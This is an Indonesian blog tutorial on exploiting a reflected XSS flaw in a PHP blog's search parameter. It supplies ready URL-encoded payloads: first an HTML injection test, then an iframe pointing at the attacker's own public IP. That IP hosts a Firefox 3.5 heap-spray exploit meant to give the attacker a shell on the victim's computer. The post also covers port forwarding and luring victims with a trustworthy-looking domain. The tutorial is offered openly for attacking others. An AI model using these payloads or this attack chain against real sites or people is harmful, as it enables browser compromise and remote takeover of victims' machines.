Teknik XSS merupakan suatu cara untuk memasukan / menginjeksikan
kode-kode HTML ke suatu situs dengan menggunakan browser. Teknik ini
umumnya digunakan oleh attacker untuk diberikan ke target untuk membuka
dengan tujuan yang beragam misalnya untuk social engineering. Disini
penulis akan mencontohkan bagaimana cara penyerang memungkinkan mendapat
shell target yang membuka dengan alamat situs yang memiliki celah
keamanan XSS sebagai bentuk pancingan agar korban atau si target mau
membukanya karena alamat domain depan yang terlihat meyakinkan,
disinilah fungsi XSS adalah untuk lebih meyakinkan target.
Disini penulis mencontohkan celah keamanan pada CMS Blog PHP yang memiliki celah keamanan XSS pada variabel search di index.php.
http://situsblogphp.com
Di tes file index.php dengan variabel search di masukkan inputan kode html.
http://situsblogphp.com/index.php?search=%22%3E%3C/title%3E%3Cmarquee%20bgcolor=%22red%22%3E%3CH2%3EKurniawan%20ganteng%3C/H2%3E%3C/marquee%3E
Hasilnya :
Setelah mengetahui site memiliki bug XSS maka kita dapat
memanipulasinya lebih jauh dengan memanfaatkan iframe untuk menyerang
komputer orang lain yang membuka URL yang kita miliki.
Contoh memanfaatkan IFRAME untuk XSS untuk membuka site Yogyafree X-code.
http://situsblogphp.com/index.php?search=%22%3E%3C/TITLE%3E%3CIFRAME%20src=http://xcode.or.id%3E%3CIFRAME%3E
Binggo, ternyata tampil bagian dari site Yogyafree X-code. Untuk
PoC-nya maka kita aktifkan exploit yang dapat menyebabkan target jika
membuka suatu URL maka kita dimungkinkan untuk mendapatkan shell pada
komputer target yang dikarenakan bisa dari celah keamanan browser, celah
keamanan pembuka document yang terintegrasi dengan browser dan
sebagainya.
Disini contohnya celah keamanan Heap Spray pada Mozilla Firefox 3.5.
Pastikan IP kita adalah IP Publik, jika kita menggunakan koneksi speedy
dengan router modem yang di share koneksinya maka anda dapat
memanfaatkan port forwarding yang dimana diarahkan ke IP lokal komputer
kita.
Contoh mengaktifkan exploit firefox di komputer kita :
Setelah kita mengaktifkan exploit kita maka kita tinggal memasukkan
IP publik kita yang misal contohnya 180.252.132.168 dilakukan
penggabungan dengan URL, hasilnya dapat sebagai berikut :
http://situsblogphp.com/index.php?search=%22%3E%3C/TITLE%3E%3CIFRAME%20src=http://180.252.132.168%3E%3CIFRAME%3E
Jika target menggunakan Mozilla Firefox 3.5 dan terus memaksa untuk
membuka URL tersebut maka anda dapat menebak kemungkinan hasil dari
akibat tindakan tersebut.
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar